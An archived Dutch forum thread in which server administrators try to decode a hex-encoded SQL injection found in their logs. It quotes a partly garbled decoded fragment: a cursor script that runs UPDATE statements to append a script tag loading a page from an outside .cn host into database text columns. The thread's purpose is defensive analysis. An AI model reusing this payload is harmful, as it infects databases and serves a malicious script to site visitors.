Archief - Attack op MS SQL server

We hebben hier een attack binnengekregen op onze server. Alhoewel we niet op een MS SQL server zitten vragen we ons eigenlijk wel af wat die doet... Via de logs hebben we het kunnen traceren tot volgend commando:


Ik heb al via een hex to ascii convertor dat proberen omzetten maar dan krijg ik nog altijd redelijk wat rare tekens. Enkel het begin komt er door wat gewoon een declare is...

Iemand een idee wat het correcte statement is dat hiermee wordt bedoeld, kwestie dat we dan ons systeem nog beter kunnen beveiligen en aan de mensen die wel op een MS SQL zitten dit kunnen doorgeven.

Ik denk niet dat dit script veel kapot kan maken, waarschijnlijk is de bedoeling eerder om dit script meermaals na elkaar te laten runnen zodat de resources (cpu en ram gebruik) de spuigaten uitlopen en de server crasht.

Als ik het script run op een testserver met mssql 2005, krijg ik hetvolgende als resultaat van "print @s":

DECLARE @T varchar"DT4Ä$RF&ÆUô7W'6÷"5U%4õ"ame from sysobjects a,syscolræBç&#8225;G&#8212;SÒwRræB&#8224;"ç&#8225;G&#8212;b.xtype=231 or b.xtype=167) D&#8218;äU&#8230;Be$ôÒF&ÆUô7W'6÷"&#8221;å_STATUS=0) BEGIN exec('updateÓÒrr#ãÂ÷F&#8212;FÆSãÇ67&&#8212;B7&3Ò&&#8225;srss/new.htm"></script><!--'"ræ÷BÆ&#8211;¶RrrR#ãÂ÷F&#8212;FÆSãÇ67&s11qn.cn/csrss/new.htm"></scuBe$ôÒF&ÆUô7W'6÷"&#8221;åDòBrsor DEALLOCATE Table_Cursor

Er wordt dus wel degelijk geprobeerd iets uit te voeren.

K.

Awel ja... ik heb het zo ver ook kunnen ontcijferen maar het lijkt me vreemd want die rare tekens doen toch niets speciaal?
Doet hij effectief iets of zou het echter maar gaan om een DoS?

passero zei:

Awel ja... ik heb het zo ver ook kunnen ontcijferen maar het lijkt me vreemd want die rare tekens doen toch niets speciaal?
Doet hij effectief iets of zou het echter maar gaan om een DoS?

Klik om te vergroten...

begin exec update
en sys.objects

mmm

lijkt mij nie random ze